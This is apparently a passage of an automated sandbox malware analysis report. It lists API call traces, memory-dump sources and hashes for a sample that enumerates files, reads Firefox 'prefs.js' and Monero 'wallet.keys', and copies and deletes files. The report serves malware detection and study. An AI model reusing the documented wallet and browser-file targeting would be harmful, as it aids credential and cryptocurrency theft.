                              • Part of subcall function 0068A740: lstrcpy.KERNEL32(00690E17,00000000), ref: 0068A788
                              • Part of subcall function 0068A920: lstrcpy.KERNEL32(00000000,?), ref: 0068A972
                              • Part of subcall function 0068A920: lstrcat.KERNEL32(00000000), ref: 0068A982
                              • Part of subcall function 0068A9B0: lstrlen.KERNEL32(?,012B8BB8,?,\Monero\wallet.keys,00690E17), ref: 0068A9C5
                              • Part of subcall function 0068A9B0: lstrcpy.KERNEL32(00000000), ref: 0068AA04
                              • Part of subcall function 0068A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0068AA12
                              • Part of subcall function 0068A8A0: lstrcpy.KERNEL32(?,00690E17), ref: 0068A905
                            • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,006915B8,00690D96), ref: 0067F71E
                            • StrCmpCA.SHLWAPI(?,006915BC), ref: 0067F76F
                            • StrCmpCA.SHLWAPI(?,006915C0), ref: 0067F785
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 0067FAB1
                            • FindClose.KERNEL32(000000FF), ref: 0067FAC3
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1366369367.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                             • Associated: 00000000.00000002.1366348513.0000000000670000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366369367.0000000000721000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366369367.000000000072D000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366369367.0000000000752000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366369367.00000000008BA000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366641315.00000000008CE000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366641315.0000000000A59000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366641315.0000000000B2F000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366641315.0000000000B51000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366641315.0000000000B5C000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366641315.0000000000B6A000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1367399051.0000000000B6B000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1367500286.0000000000D07000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1367516409.0000000000D08000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_670000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                            • String ID: prefs.js
                            • API String ID: 3334442632-3783873740
                            • Opcode ID: b50bad15d07e1e70b06abbbc572fe05a3459b43996da99fa310da21e3433817e
                            • Instruction ID: 974a6d5d16d8706268da5fd2ed29ebcbf672cbe0b9594c768eb0b9b0fdc96d2c
                            • Opcode Fuzzy Hash: b50bad15d07e1e70b06abbbc572fe05a3459b43996da99fa310da21e3433817e
                            • Instruction Fuzzy Hash: DBB155719001149BEB64FFA0DC95EED737AAF54300F5086ADE80E96141EF346B49CF96
                            APIs
                              • Part of subcall function 0068A740: lstrcpy.KERNEL32(00690E17,00000000), ref: 0068A788
                            • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0069510C,?,?,?,006951B4,?,?,00000000,?,00000000), ref: 00671923
                            • StrCmpCA.SHLWAPI(?,0069525C), ref: 00671973
                            • StrCmpCA.SHLWAPI(?,00695304), ref: 00671989
                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00671D40
                            • DeleteFileA.KERNEL32(00000000), ref: 00671DCA
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 00671E20
                            • FindClose.KERNEL32(000000FF), ref: 00671E32
                              • Part of subcall function 0068A920: lstrcpy.KERNEL32(00000000,?), ref: 0068A972
                              • Part of subcall function 0068A920: lstrcat.KERNEL32(00000000), ref: 0068A982
                              • Part of subcall function 0068A9B0: lstrlen.KERNEL32(?,012B8BB8,?,\Monero\wallet.keys,00690E17), ref: 0068A9C5
                              • Part of subcall function 0068A9B0: lstrcpy.KERNEL32(00000000), ref: 0068AA04
                              • Part of subcall function 0068A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0068AA12
                              • Part of subcall function 0068A8A0: lstrcpy.KERNEL32(?,00690E17), ref: 0068A905
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1366369367.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                             • Associated: 00000000.00000002.1366348513.0000000000670000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366369367.0000000000721000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366369367.000000000072D000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366369367.0000000000752000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366369367.00000000008BA000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366641315.00000000008CE000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366641315.0000000000A59000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366641315.0000000000B2F000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366641315.0000000000B51000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366641315.0000000000B5C000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366641315.0000000000B6A000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1367399051.0000000000B6B000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1367500286.0000000000D07000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1367516409.0000000000D08000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_670000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                            • String ID: \*.*
                            • API String ID: 1415058207-1173974218
                            • Opcode ID: 4d90e04dc9201fe43eb66e185c1e300d40e93ee7392aa265ddab40879a6604b3
                            • Instruction ID: ab60c229aa07edf59b1100fd39f2fea0c1d69c13714a547afd02b6dda51e611d
                            • Opcode Fuzzy Hash: 4d90e04dc9201fe43eb66e185c1e300d40e93ee7392aa265ddab40879a6604b3
                            • Instruction Fuzzy Hash: 291245719111189BEF59FBA0CC95AED737AAF14300F4042DEB90A66091EF346F49CFA5
                            APIs
                              • Part of subcall function 0068A740: lstrcpy.KERNEL32(00690E17,00000000), ref: 0068A788
                              • Part of subcall function 0068A9B0: lstrlen.KERNEL32(?,012B8BB8,?,\Monero\wallet.keys,00690E17), ref: 0068A9C5
                              • Part of subcall function 0068A9B0: lstrcpy.KERNEL32(00000000), ref: 0068AA04
                              • Part of subcall function 0068A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0068AA12
                              • Part of subcall function 0068A8A0: lstrcpy.KERNEL32(?,00690E17), ref: 0068A905
                            • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00690C2E), ref: 0067DE5E
                            • StrCmpCA.SHLWAPI(?,006914C8), ref: 0067DEAE
                            • StrCmpCA.SHLWAPI(?,006914CC), ref: 0067DEC4
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 0067E3E0
                            • FindClose.KERNEL32(000000FF), ref: 0067E3F2
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1366369367.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                             • Associated: 00000000.00000002.1366348513.0000000000670000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366369367.0000000000721000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366369367.000000000072D000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366369367.0000000000752000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366369367.00000000008BA000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366641315.00000000008CE000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366641315.0000000000A59000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366641315.0000000000B2F000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366641315.0000000000B51000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366641315.0000000000B5C000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366641315.0000000000B6A000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1367399051.0000000000B6B000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1367500286.0000000000D07000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1367516409.0000000000D08000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_670000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                            • String ID: \*.*
                            • API String ID: 2325840235-1173974218
                            • Opcode ID: 66329986afa3744ff0e9ecc61f1db56345c4991c6a669b41c6ba226e57b50a41
                            • Instruction ID: f69acb40ac03b5193eeeb8ad0910f359970deb7dda2f3a21bfc3cec552075857
                            • Opcode Fuzzy Hash: 66329986afa3744ff0e9ecc61f1db56345c4991c6a669b41c6ba226e57b50a41
                            • Instruction Fuzzy Hash: B0F1A3714151189AEB59FBA0CC95EEE737ABF14300F5042DEA81A62091EF346F4ACF66
                            APIs
                              • Part of subcall function 0068A740: lstrcpy.KERNEL32(00690E17,00000000), ref: 0068A788
                              • Part of subcall function 0068A920: lstrcpy.KERNEL32(00000000,?), ref: 0068A972
                              • Part of subcall function 0068A920: lstrcat.KERNEL32(00000000), ref: 0068A982
                              • Part of subcall function 0068A9B0: lstrlen.KERNEL32(?,012B8BB8,?,\Monero\wallet.keys,00690E17), ref: 0068A9C5
                              • Part of subcall function 0068A9B0: lstrcpy.KERNEL32(00000000), ref: 0068AA04
                              • Part of subcall function 0068A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0068AA12
                              • Part of subcall function 0068A8A0: lstrcpy.KERNEL32(?,00690E17), ref: 0068A905
                            • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,006914B0,00690C2A), ref: 0067DAEB
                            • StrCmpCA.SHLWAPI(?,006914B4), ref: 0067DB33
                            • StrCmpCA.SHLWAPI(?,006914B8), ref: 0067DB49
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 0067DDCC
                            • FindClose.KERNEL32(000000FF), ref: 0067DDDE
                            Memory Dump Source
                            • Source File: 00000000.00000002.1366369367.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                             • Associated: 00000000.00000002.1366348513.0000000000670000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366369367.0000000000721000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366369367.000000000072D000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366369367.0000000000752000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366369367.00000000008BA000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366641315.00000000008CE000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366641315.0000000000A59000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366641315.0000000000B2F000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366641315.0000000000B51000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366641315.0000000000B5C000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366641315.0000000000B6A000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1367399051.0000000000B6B000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1367500286.0000000000D07000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1367516409.0000000000D08000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_670000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                            • String ID:
                            • API String ID: 3334442632-0
                            • Opcode ID: 4014901a23937bbff88936eb5a86db616a893034f8de21a54460f9e288adab32
                            • Instruction ID: 7d5b568c8c48f80a3b5f10412119dccb7129f180c8480b41588356b0e1287c4a
                            • Opcode Fuzzy Hash: 4014901a23937bbff88936eb5a86db616a893034f8de21a54460f9e288adab32
                            • Instruction Fuzzy Hash: D19127B69001049BDB54FBB4DC569ED737FAF84300F40875DFD0AA6141EE38AB498B96
                            APIs
                              • Part of subcall function 0068A740: lstrcpy.KERNEL32(00690E17,00000000), ref: 0068A788
                            • GetKeyboardLayoutList.USER32(00000000,00000000,006905AF), ref: 00687BE1
                            • LocalAlloc.KERNEL32(00000040,?), ref: 00687BF9
                            • GetKeyboardLayoutList.USER32(?,00000000), ref: 00687C0D
                            • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00687C62
                            • LocalFree.KERNEL32(00000000), ref: 00687D22
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1366369367.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                             • Associated: 00000000.00000002.1366348513.0000000000670000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366369367.0000000000721000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366369367.000000000072D000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366369367.0000000000752000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366369367.00000000008BA000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366641315.00000000008CE000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366641315.0000000000A59000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366641315.0000000000B2F000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366641315.0000000000B51000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366641315.0000000000B5C000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366641315.0000000000B6A000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1367399051.0000000000B6B000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1367500286.0000000000D07000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1367516409.0000000000D08000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_670000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                            • String ID: /
                            • API String ID: 3090951853-4001269591
                            • Opcode ID: c68035ae792acfa0a7de22baeff4d58f7d4677cebba94698ba720399e967b03d
                            • Instruction ID: 00a978ff2d3538fb1040ff4c2b6b25bae292c07bde9506179e0ebd9fa2ea6b37
                            • Opcode Fuzzy Hash: c68035ae792acfa0a7de22baeff4d58f7d4677cebba94698ba720399e967b03d
                            • Instruction Fuzzy Hash: B2417E71901218AFDB24EB94DC99BEEB379FF44700F2042D9E40962290DB346F86CFA5
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1366641315.00000000008CE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                             • Associated: 00000000.00000002.1366348513.0000000000670000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366369367.0000000000671000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366369367.0000000000721000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366369367.000000000072D000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366369367.0000000000752000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366369367.00000000008BA000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366641315.0000000000A59000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366641315.0000000000B2F000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366641315.0000000000B51000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366641315.0000000000B5C000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366641315.0000000000B6A000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1367399051.0000000000B6B000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1367500286.0000000000D07000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1367516409.0000000000D08000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_670000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: o$e={$vx;$wL[o$#{|$R7]$9[
                            • API String ID: 0-3673019907
                            • Opcode ID: 2112db96df16b97b2ade585b4999f6c8027f5ea9d2463703293413a8177371d6
                            • Instruction ID: bf7b472cbdde5821d874292caba70ce96fbdcac76dafdda930d23ea8a5c15fa3
                            • Opcode Fuzzy Hash: 2112db96df16b97b2ade585b4999f6c8027f5ea9d2463703293413a8177371d6
                            • Instruction Fuzzy Hash: 43B26BF390C2049FD3046E2DEC8567AFBE9EF94720F1A863DEAC4D3744E63598058696
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1366641315.00000000008CE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                             • Associated: 00000000.00000002.1366348513.0000000000670000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366369367.0000000000671000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366369367.0000000000721000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366369367.000000000072D000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366369367.0000000000752000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366369367.00000000008BA000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366641315.0000000000A59000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366641315.0000000000B2F000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366641315.0000000000B51000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366641315.0000000000B5C000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366641315.0000000000B6A000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1367399051.0000000000B6B000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1367500286.0000000000D07000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1367516409.0000000000D08000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_670000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: -lo$`H8Q$q~~;$rv~$t;a+$y}$%?f
                            • API String ID: 0-2045357309
                            • Opcode ID: 3e7f0b8175b9a07caecc3f242503b28f1d34376b235fdf6f83b4845224b396aa
                            • Instruction ID: d4606ee8e6953110eed858b6ba7e0eceef48f42a78cffc78757cd11ff951e3ff
                            • Opcode Fuzzy Hash: 3e7f0b8175b9a07caecc3f242503b28f1d34376b235fdf6f83b4845224b396aa
                            • Instruction Fuzzy Hash: C0B2E6F360C204AFE704AE2DEC8567ABBE5EF94720F16493DEAC4C3744EA3558058697
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1366641315.00000000008CE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                             • Associated: 00000000.00000002.1366348513.0000000000670000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366369367.0000000000671000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366369367.0000000000721000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366369367.000000000072D000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366369367.0000000000752000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366369367.00000000008BA000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366641315.0000000000A59000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366641315.0000000000B2F000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366641315.0000000000B51000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366641315.0000000000B5C000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366641315.0000000000B6A000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1367399051.0000000000B6B000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1367500286.0000000000D07000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1367516409.0000000000D08000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_670000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: *le$:hOJ$B@H@$Jz_$qq9z$ 7$Eq\
                            • API String ID: 0-2278452203
                            • Opcode ID: 007ac023f1ed767047ef464d0679567a8daaaaba6762ea2719f205805f197edf
                            • Instruction ID: 480891c259de292d9d211d9105f49f1186369f5bc22bb0c63ada933252117170
                            • Opcode Fuzzy Hash: 007ac023f1ed767047ef464d0679567a8daaaaba6762ea2719f205805f197edf
                            • Instruction Fuzzy Hash: 75B2D4F3A082009FE704AE29EC8567ABBE5EF94320F16493DEAC4C7744E63598158797
                            APIs
                              • Part of subcall function 0068A740: lstrcpy.KERNEL32(00690E17,00000000), ref: 0068A788
                              • Part of subcall function 0068A920: lstrcpy.KERNEL32(00000000,?), ref: 0068A972
                              • Part of subcall function 0068A920: lstrcat.KERNEL32(00000000), ref: 0068A982
                              • Part of subcall function 0068A9B0: lstrlen.KERNEL32(?,012B8BB8,?,\Monero\wallet.keys,00690E17), ref: 0068A9C5
                              • Part of subcall function 0068A9B0: lstrcpy.KERNEL32(00000000), ref: 0068AA04
                              • Part of subcall function 0068A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0068AA12
                              • Part of subcall function 0068A8A0: lstrcpy.KERNEL32(?,00690E17), ref: 0068A905
                            • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00690D73), ref: 0067E4A2
                            • StrCmpCA.SHLWAPI(?,006914F8), ref: 0067E4F2
                            • StrCmpCA.SHLWAPI(?,006914FC), ref: 0067E508
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 0067EBDF
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1366369367.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                             • Associated: 00000000.00000002.1366348513.0000000000670000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366369367.0000000000721000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366369367.000000000072D000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366369367.0000000000752000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366369367.00000000008BA000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366641315.00000000008CE000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366641315.0000000000A59000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366641315.0000000000B2F000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366641315.0000000000B51000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366641315.0000000000B5C000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366641315.0000000000B6A000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1367399051.0000000000B6B000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1367500286.0000000000D07000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1367516409.0000000000D08000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_670000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                            • String ID: \*.*
                            • API String ID: 433455689-1173974218
                            • Opcode ID: b4a7d722e07e2c27f8f88b7e379d88627a165aa0b4fc1488a30a30fdccee565d
                            • Instruction ID: a96320d9cdc8e2d805dbc1bb7e457ee58f3d7eeabcaa907b1b941c9f6c5a6889
                            • Opcode Fuzzy Hash: b4a7d722e07e2c27f8f88b7e379d88627a165aa0b4fc1488a30a30fdccee565d
                            • Instruction Fuzzy Hash: 321256719111149AEF58FBA0DC96DED733AAF54300F40439EB90A66091EF386F49CFA6
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1366641315.00000000008CE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                             • Associated: 00000000.00000002.1366348513.0000000000670000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366369367.0000000000671000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366369367.0000000000721000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366369367.000000000072D000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366369367.0000000000752000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366369367.00000000008BA000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366641315.0000000000A59000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366641315.0000000000B2F000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366641315.0000000000B51000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366641315.0000000000B5C000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366641315.0000000000B6A000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1367399051.0000000000B6B000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1367500286.0000000000D07000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1367516409.0000000000D08000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_670000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: ,Jm$:uf?$D=_$W/?$\|=i$,%{
                            • API String ID: 0-1816673933
                            • Opcode ID: b84f2e96f45d8fcf62cc6eb76490d7c4ad4d7ff2047c8c03e6a861979dc0a366
                            • Instruction ID: bbe3c8583aca9dc00c17442e28ef326d0b1e45b0be46b8cb76f682e5e1755b0b
                            • Opcode Fuzzy Hash: b84f2e96f45d8fcf62cc6eb76490d7c4ad4d7ff2047c8c03e6a861979dc0a366
                            • Instruction Fuzzy Hash: 45A2F3F3A0C2049FE314AE29EC8567AFBE9EF94320F16493DEAC4C3744E63558058697
                            APIs
                            • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,Ng,00000000,00000000), ref: 00679AEF
                            • LocalAlloc.KERNEL32(00000040,?,?,?,00674EEE,00000000,?), ref: 00679B01
                            • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,Ng,00000000,00000000), ref: 00679B2A
                            • LocalFree.KERNEL32(?,?,?,?,00674EEE,00000000,?), ref: 00679B3F
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1366369367.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                             • Associated: 00000000.00000002.1366348513.0000000000670000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366369367.0000000000721000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366369367.000000000072D000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366369367.0000000000752000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366369367.00000000008BA000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366641315.00000000008CE000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366641315.0000000000A59000.00000040.00000001.01000000.00000003.sdmp
